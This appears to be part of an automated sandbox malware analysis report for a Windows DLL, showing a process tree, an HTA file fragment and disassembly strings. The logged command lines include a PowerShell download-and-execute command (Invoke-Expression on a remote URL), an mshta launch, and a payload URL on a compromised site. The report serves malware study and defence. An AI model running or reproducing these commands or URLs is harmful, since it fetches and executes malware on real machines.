                      2024-05-22 20:08:40 UTC2331INData Raw: 3c 68 65 61 64 3e 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0d 0a 20 20 3c 48 54 41 3a 41 50 50 4c 49 43 41 54 49 4f 4e 20 69 63 6f 6e 3d 22 23 22 20 57 49 4e 44 4f 57 53 54 41 54 45 3d 22 6d 69 6e 69 6d 69 7a 65 22 20 53 48 4f 57 49 4e 54 41 53 4b 42 41 52 3d 22 6e 6f 22 20 53 59 53 4d 45 4e 55 3d 22 6e 6f 22 20 20 43 41 50 54 49 4f 4e 3d 22 6e 6f 22 20 2f 3e 20 20 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 76 62 73 63 72 69 70 74 22 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: <head> <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> <script type="text/vbscript">


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:16:08:34
                      Start date:22/05/2024
                      Path:C:\Windows\System32\loaddll64.exe
                      Wow64 process (32bit):false
                      Commandline:loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll"
                      Imagebase:0x7ff60f2f0000
                      File size:165'888 bytes
                      MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:1
                      Start time:16:08:34
                      Start date:22/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:2
                      Start time:16:08:35
                      Start date:22/05/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1
                      Imagebase:0x7ff765c60000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:3
                      Start time:16:08:35
                      Start date:22/05/2024
                      Path:C:\Windows\System32\rundll32.exe
                      Wow64 process (32bit):false
                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,hash
                      Imagebase:0x7ff634910000
                      File size:71'680 bytes
                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:16:08:35
                      Start date:22/05/2024
                      Path:C:\Windows\System32\rundll32.exe
                      Wow64 process (32bit):false
                      Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1
                      Imagebase:0x7ff634910000
                      File size:71'680 bytes
                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:9
                      Start time:16:08:35
                      Start date:22/05/2024
                      Path:C:\Windows\System32\WerFault.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\WerFault.exe -u -p 4024 -s 424
                      Imagebase:0x7ff798650000
                      File size:570'736 bytes
                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:10
                      Start time:16:08:35
                      Start date:22/05/2024
                      Path:C:\Windows\System32\WerFault.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\WerFault.exe -u -p 5836 -s 416
                      Imagebase:0x7ff798650000
                      File size:570'736 bytes
                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:12
                      Start time:16:08:38
                      Start date:22/05/2024
                      Path:C:\Windows\System32\rundll32.exe
                      Wow64 process (32bit):false
                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,xlAutoOpen
                      Imagebase:0x7ff634910000
                      File size:71'680 bytes
                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:13
                      Start time:16:08:39
                      Start date:22/05/2024
                      Path:C:\Windows\SysWOW64\mshta.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
                      Imagebase:0xb30000
                      File size:13'312 bytes
                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:15
                      Start time:16:08:40
                      Start date:22/05/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
                      Imagebase:0x740000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:16
                      Start time:16:08:40
                      Start date:22/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:17
                      Start time:16:08:41
                      Start date:22/05/2024
                      Path:C:\Windows\System32\rundll32.exe
                      Wow64 process (32bit):false
                      Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",hash
                      Imagebase:0x7ff634910000
                      File size:71'680 bytes
                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:18
                      Start time:16:08:41
                      Start date:22/05/2024
                      Path:C:\Windows\System32\rundll32.exe
                      Wow64 process (32bit):false
                      Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",xlAutoOpen
                      Imagebase:0x7ff634910000
                      File size:71'680 bytes
                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:20
                      Start time:16:08:41
                      Start date:22/05/2024
                      Path:C:\Windows\System32\WerFault.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\WerFault.exe -u -p 7600 -s 416
                      Imagebase:0x7ff798650000
                      File size:570'736 bytes
                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:21
                      Start time:16:08:41
                      Start date:22/05/2024
                      Path:C:\Windows\SysWOW64\mshta.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
                      Imagebase:0xb30000
                      File size:13'312 bytes
                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:22
                      Start time:16:08:42
                      Start date:22/05/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
                      Imagebase:0x740000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:23
                      Start time:16:08:42
                      Start date:22/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Disassembly

                      Reset < >

                        Non-executed Functions

                        Function 00007FF8BFAB15B0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2276023913.00007FF8BFAB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                        • Associated: 00000003.00000002.2275999362.00007FF8BFAB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2276044062.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2276066458.00007FF8BFAB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7ff8bfab0000_rundll32.jbxd
                        Similarity
                        • API ID: QueryVirtual
                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                        • API String ID: 1804819252-1534286854
                        • Opcode ID: ff20adf7c188d621bc95c9e66d7c1f46b2629ec79b15ce19cc76e873bdd8993b
                        • Instruction ID: a19c7c87764d8a415cfdd3cc6b3d82126227870ffbd1a835e177718184687d32
                        • Opcode Fuzzy Hash: ff20adf7c188d621bc95c9e66d7c1f46b2629ec79b15ce19cc76e873bdd8993b
                        • Instruction Fuzzy Hash: 0941BF71A08F0282EA089F99E4967B97BA4FF45BC8F446135DB0D07396EE3CE545C700
                        Function 00007FF8BFAB13A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 17COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2276023913.00007FF8BFAB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                        • Associated: 00000003.00000002.2275999362.00007FF8BFAB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2276044062.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2276066458.00007FF8BFAB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7ff8bfab0000_rundll32.jbxd
                        Similarity
                        • API ID: ExecuteShell
                        • String ID: c:\users\public\example.hta$https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt$mshta$open
                        • API String ID: 587946157-3291801218
                        • Opcode ID: e3c409afdc72bbf396cfbf0a4b302ed212031b5393d0bcd3fc2828a60e136157
                        • Instruction ID: a3f768f18aad5c50f54649dae7d2368e406bb32b920232e3afd06afc5e355ae7
                        • Opcode Fuzzy Hash: e3c409afdc72bbf396cfbf0a4b302ed212031b5393d0bcd3fc2828a60e136157
                        • Instruction Fuzzy Hash: 86E0C97190CE4691EB189F98F8563E53764FB4838CF80613ADA4E42666DF7C9209C744
                        Function 00007FF8BFAB1010 Relevance: 6.1, APIs: 4, Instructions: 124sleepCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.2276023913.00007FF8BFAB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                        • Associated: 00000003.00000002.2275999362.00007FF8BFAB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2276044062.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2276066458.00007FF8BFAB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7ff8bfab0000_rundll32.jbxd
                        Similarity
                        • API ID: Sleep_amsg_exit
                        • String ID:
                        • API String ID: 1015461914-0
                        • Opcode ID: 0a35f59cebe7f284c41c6f085f131cde47359b9507e63e2bc55cb021e80e0f1e
                        • Instruction ID: e14187f9e0ac11e69900e7c81f42332d16f82d9e2110220663b543287c4cc9f3
                        • Opcode Fuzzy Hash: 0a35f59cebe7f284c41c6f085f131cde47359b9507e63e2bc55cb021e80e0f1e
                        • Instruction Fuzzy Hash: 0E417D32E09D4685F65A8B9EF85237927A9AF847DCF486436DF0C47392DE3DE8819300